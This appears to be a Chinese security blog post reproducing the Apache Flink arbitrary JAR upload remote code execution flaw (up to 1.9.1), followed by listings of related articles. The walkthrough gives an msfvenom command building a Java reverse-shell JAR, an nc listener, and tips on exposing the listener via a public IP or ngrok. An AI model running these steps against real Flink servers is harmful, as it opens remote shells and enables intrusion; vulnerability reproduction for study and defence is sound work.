【漏洞复现】Apache Flink任意Jar包上传导致远程代码执行

最新推荐文章于 2024-07-04 08:43:20 发布
最新推荐文章于 2024-07-04 08:43:20 发布
阅读量1.1w 收藏 5
点赞数 3
分类专栏: 漏洞复现 渗透之路 经验分享
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sun1318578251/article/details/103056168
版权

目录

前言

记一次Apache Flink任意Jar包上传导致远程代码执行复现漏洞过程。
作者一直致力于小白都能看懂的漏洞复现过程,感谢大家们一路以来的支持!

致谢Cx01、丞相等表哥们。没有你们的帮助,没有这篇文章!

0x01 漏洞描述

近日,有安全研究员公开了一个Apache Flink的任意Jar包上传导致远程代码执行的漏洞.
影响范围:<= 1.9.1(最新版本)
可能是我测的比较少,成功的概率1.9版本比较高。

在这里插入图片描述

0x02 漏洞威胁等级

高危

可导致远程代码执行

0x03 漏洞复现

第一步生成payload
msfvenom -p java/shell_reverse_tcp LHOST=x.x.x.x LPORT=x -f jar >fuck.jar
名字可以任意取

在这里插入图片描述
第二步生成监听端口,这里我选择nc监听端口。
nc -lvp port

在这里插入图片描述
第三步上传payload
在这里插入图片描述
最后直接返回shell
在这里插入图片描述
接着执行命令
在这里插入图片描述

0x04 复现那些坑

一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!
一定要生成公网ip的payload!!!

没有钱的小哥哥,小姐姐们可以选择一个Sunny-ngrok 工具进行端口转发。
官方Sunny-ngrok教程
在这里插入图片描述

最低0.47元/天 解锁文章
夏日清1
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 9
    评论
专栏目录
复现CVE-2020-17518——Apache Flink upload 远程命令执行漏洞
记录并分享学习安全的知识点..
10-01 704
复现CVE-2020-17518——Apache Flink upload 远程命令执行漏洞
Apache Flink任意Jar包上传导致远程代码执行漏洞复现
Heytoo的博客
06-19 682
0x00 简介 Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 0x01 Flink应用场景 优化电子商务的实时搜索结果:阿里巴巴的所有基础设施团队使用flink实时更新产品细节和库存信息,为用户提供更高的关联性。 针对数据分析团队提供实时流处理服务:flink通过flink-powered数据分析平台提供实时数
Apache Flink 任意 JAR 包上传漏洞利用及防范策略
最新发布
weixin_43822401的博客
07-04 778
漏洞主要影响配置不当的 Apache Flink 集群,允许攻击者通过 Web 界面上传恶意 JAR 包,执行远程代码Apache Flink任意 JAR 包上传漏洞是一个严重的安全隐患,需要立即采取措施进行修复。通过本文提供的分析和防范策略,可以帮助管理员和开发人员保护他们的 Flink 集群不受此漏洞的影响,确保大数据环境的安全性。本文提供的案例和方法仅用于教学目的,实际操作时应确保遵守相关法律法规,不应用于非法侵入或攻击他人系统。
漏洞预警」Apache Flink 任意 Jar 包上传导致远程代码执行漏洞复现
大数据流动
11-26 1174
漏洞描述 Apache Flink是一个用于分布式流和批处理数据的开放源码平台。Flink的核心是一个流数据流引擎,它为数据流上的分布式计算提供数据分发、通信和容错功能。Flink在流引擎之上构建批处理,覆盖本地迭代支持、托管内存和程序优化。近日有安全研究人员发现apache flink允许上传任意jar包从而导致远程代码执行漏洞级别 高危 影响范围 Apache Flink ...
apache flink任意jar包上传导致远程代码执行
蚁景网安学院
11-15 564
漏洞描述:2019年11月11号,安全工程师Henry Chen披露了一个Apache Flink未授权上传jar包导致远程代码执行漏洞。由于Apache Flink Dashboar...
java图片上传代码_apache flink任意jar包上传导致远程代码执行
weixin_39867125的博客
12-02 166
漏洞描述:2019年11月11号,安全工程师Henry Chen披露了一个Apache Flink未授权上传jar包导致远程代码执行漏洞。由于Apache Flink Dashboard 默认无需认证即可访问,通过上传恶意jar包并触发恶意代码执行,从而获取shell。影响范围<= 1.9.1(最新版本)环境搭建:(1) 提前安装好java(需要java8以上)(2) 下载fli...
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现
Senimo
07-28 1734
Apache Flink 文件上传漏洞 CVE-2020-17518 漏洞复现一、漏洞描述二、漏洞影响三、漏洞复现1、环境搭建2、漏洞复现四、漏洞POC五、参考链接 一、漏洞描述 ApacheFlink是一个开源的流处理框架,具有强大的流处理和批处理功能。 ApacheFlink 1.5.1 引入了 REST 处理程序,允许您通过恶意修改的 HTTP 头将上载的文件写入本地文件系统上的任意位置。 二、漏洞影响 1.5.1 < ApacheFlink < 1.11.2 三、漏洞复现 1、环境搭建
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
SmileAssassn的博客
01-08 575
Apache Flink文件上传漏洞(CVE-2020-17518)漏洞复现分析
网络安全漏洞分析之远程代码执行
Karka_的博客
06-06 266
Apache Flume 是一个分布式的,可靠的,并且可用于高效地收集,汇总和移动大量日志数据的软件。它具有基于流数据流的简单而灵活的体系结构。它具有可调的可靠性机制以及许多故障转移和恢复机制,并且具有健壮性和容错性。它使用一个简单的可扩展数据模型,该模型允许进行在线分析应用程序。
Apache Flink任意jar包上传漏洞复现
来到了学渣的博客
07-18 523
这个漏洞也是我在参加攻防演练的时候碰到的,这个Apache Flink文档搭建好后一般都会在8081端口映射出来。 漏洞环境 主要的影响版本<= 1.9.1 攻击机ip 192.168.10.144 漏洞环境ip 192.168.10.158 Apache Flink的下载地址 https://www.apache.org/dyn/closer.lua/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz 安装解压好后,来到bin目录下启动文件然后
Apache Fink 文件上传漏洞复现及利用
Tauil的博客
07-28 1003
其它不修改,然后点击发送,因为该版本的ApacheFlink中存在有一个目录穿越漏洞,详细内容在。一个数据包,数据包中的文件,右键点击重发,然后可以看到数据包中内容。应该就是文件的名称,其创建文件的路径猜测是其默认文件路径的。boundary是分隔符,不用关注,查看到其。处进行检查或者强制规定的路径,而是使用类似。这样的直接创建文件的命令,我们可以通过修改。,我们可以使用该漏洞查看我们创建的内容。,所以猜测该网页文件地址应该是在。的效果,所以我们修改消息体内容为。查看网络数据包,然后上传任意文件。.....
flink
zyzn1425077119的博客
10-29 188
参考:https://blog.csdn.net/lp284558195/article/details/92798595 https://baike.baidu.com/item/flink/9078426?fr=aladdin Apache Flink是由Apache软件基金会开发的开源流处理框架,其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序,Flink的流水线运行时系统可以执行批处理和流处理程序。 ...
Apache Flink (最新版本) 远程代码执行
自强不息
05-04 708
路虽远,行则将至;事虽难,做则必成
Log4j2 Zero Day 漏洞 Apache Flink 应对指南
Ververica的博客
12-17 2258
▼ 关注「ApacheFlink」视频号,遇见更多大咖▼摘要:本文详细说明了Log4j2 Zero Day 漏洞的影响,以及 Flink 社区的应对方案。主要内容包括:漏洞说明Flin...
Flink入门
kimi
04-03 522
Flink入门一、基本使用1、读取有界流数据2、读取无界流数据二、结合kafka1、消费kafka消息2、生产kafka消息三、整合ElasticSearch1、生产数据 一、基本使用 关于Flink的概念这里就不作介绍了,其他文章讲的很详细,这里主要讲解实战。 1、读取有界流数据 无界流也就是我们之前说的批数据处理,Flink并不是侧重于无界流的处理,它在有界流数据处理也很出色。 public static void main(String[] args) throws Exception{
flink的web ui出现Server Response:Unable to load requested file /jars
微电子学与固体电子学-俞驰
06-08 3042
当从master的jps是: 14448 NameNode 90288 Jps 14612 DataNode 15092 ResourceManager 15270 NodeManager 13831 QuorumPeerMain 55225 YarnJobClusterEntrypoint 55482 YarnTaskExecutorRunner 54830 CliFrontend
Apache Flink 未授权远程代码执行检查
weixin_42299610的博客
06-07 1829
Apache Flink 未授权远程代码执行检查
远程代码执行漏洞
kali_Ma的博客
10-30 2054
发现data.headers中出现了x-real-ip:127.0.0.1 ,这是我们调用batch-requests插件传递的头信息,而此时系统默认的X-Real-IP为大写。在请求头覆盖中、因为 real_ip_hdr 为 X-Real-IP , 函数core.request.get_remote_clinte_ip()获取远程客户端ip、不能将 x-real-ip给覆盖。通过遍历表结构、获取到 real_ip_header 的值然后再赋值给real_ip_hdr。该值为在系统启动后、给定的默认值。
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值